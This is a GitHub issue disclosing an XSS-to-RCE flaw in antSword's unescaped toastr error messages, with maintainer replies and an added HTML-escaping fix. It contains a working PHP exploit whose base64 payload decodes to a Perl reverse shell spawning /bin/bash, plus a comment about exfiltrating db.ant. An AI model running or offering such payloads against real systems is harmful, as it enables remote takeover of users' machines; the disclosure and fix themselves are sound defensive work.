
There is RCE Vulnerability in antSword #147

Closed
ev0A opened this issue Apr 11, 2019 · 6 comments

@ev0A

commented Apr 11, 2019

I want to apply for a CVE, so I'll write the rest in English first.
When I connect to my webshell with antSword and the connection fails, antSword echoes the error information, like this:
[screenshot]
This information has no XSS protection, so I can XSS and execute system commands.
My PoC:

<?php
header('HTTP/1.1 500 <img src=# onerror=alert(1)>');

[screenshot]
My exp (for Perl):

<?php

header("HTTP/1.1 406 Not <img src=# onerror='eval(new Buffer(`cmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoJ3BlcmwgLWUgXCd1c2UgU29ja2V0OyRpPSIxMjcuMC4wLjEiOyRwPTEwMDI7c29ja2V0KFMsUEZfSU5FVCxTT0NLX1NUUkVBTSxnZXRwcm90b2J5bmFtZSgidGNwIikpO2lmKGNvbm5lY3QoUyxzb2NrYWRkcl9pbigkcCxpbmV0X2F0b24oJGkpKSkpe29wZW4oU1RESU4sIj4mUyIpO29wZW4oU1RET1VULCI+JlMiKTtvcGVuKFNUREVSUiwiPiZTIik7ZXhlYygiL2Jpbi9iYXNoIC1pIik7fTtcJycsKGVycm9yLCBzdGRvdXQsIHN0ZGVycik9PnsKICAgIGFsZXJ0KGBzdGRvdXQ6ICR7c3Rkb3V0fWApOwogIH0pOw==`,`base64`).toString())'>");
?>

The base64-decoded code:

require('child_process').exec('perl -e \'use Socket;$i="127.0.0.1";$p=1002;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};\'',(error, stdout, stderr)=>{
    alert(`stdout: ${stdout}`);
  });

Got a shell:
[screenshot]

~/source/modules/filemanage/index.js, line 206:

toastr.error((err instanceof Object) ? JSON.stringify(err) : String(err), LANG_T['error']);

Please add XSS protection.
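A defensive way to render that error string, added here as an example (not antSword's or toastr's own code): the message is built the same way as the vulnerable line and then HTML-escaped before it reaches an HTML sink. The toastr-like sink and the sample errors are constructed for the demonstration.

```javascript
// Added example, not antSword's code. The vulnerable line passed raw error text
// to toastr, which renders its message as HTML, so a crafted HTTP status line
// such as "500 <img src=# onerror=alert(1)>" became live markup in the Electron
// UI. The fix is to make the text inert before it reaches the sink.

const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Escape the five characters that let text break out into markup or attributes.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// Same message construction as the original line, followed by escaping.
function formatErrorMessage(err) {
  const raw = (err instanceof Object) ? JSON.stringify(err) : String(err);
  return escapeHtml(raw);
}

// Regression guard: escaped output must contain no raw '<' or '>' that a
// renderer could interpret as the start or end of a tag.
function isInertHtml(s) {
  return !/[<>]/.test(s);
}

// Hypothetical stand-in for the toastr sink; toastr itself is not loaded here.
function renderToast(html) {
  return `<div class="toast-message">${html}</div>`;
}

// Constructed sample inputs: a status line like the PoC, and an object error
// of the kind the original code JSON.stringify'd.
const SAMPLE_STRING_ERR = 'HTTP/1.1 500 <img src=# onerror=alert(1)>';
const SAMPLE_OBJECT_ERR = { status: 406, statusText: 'Not <img src=# onerror=alert(1)>' };

// Library-side alternative: toastr 2.1+ exposes toastr.options.escapeHtml = true.
// Escaping at the call site, as above, does not depend on that option.

console.log(renderToast(formatErrorMessage(SAMPLE_STRING_ERR)));
console.log(renderToast(formatErrorMessage(SAMPLE_OBJECT_ERR)));
```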

@Medicean
Collaborator

commented Apr 12, 2019

Thanks. To prevent similar problems with toastr in plugins, I changed toastr so that it no longer outputs HTML; HTML output will not be supported from now on.

@rootkiter

commented Apr 12, 2019

This is pretty awesome, an RCE.

@ViCrack

commented Apr 12, 2019

I feel this kind of program architecture makes it easy to miss XSS-to-RCE cases. How about applying a uniform encoding/filtering pass to all data coming from the client?

@unixcs

commented Apr 12, 2019

Exciting.

@Medicean
Collaborator

commented Apr 12, 2019

@ViCrack This one was also caused by an oversight at output time. The libraries used in the UI framework differ: for example, dhtmlx's grid and tree both encode before output, while toastr outputs HTML by design, so a one-size-fits-all approach is not a good way to handle it.

@Mr-xn

commented Apr 15, 2019

However, exploiting this requires winning a race against time. That said, one could read db.ant and send it to a remote host, taking everything. Hahaha.

@Medicean Medicean added this to Done in AntSword-v2.1 Apr 26, 2019
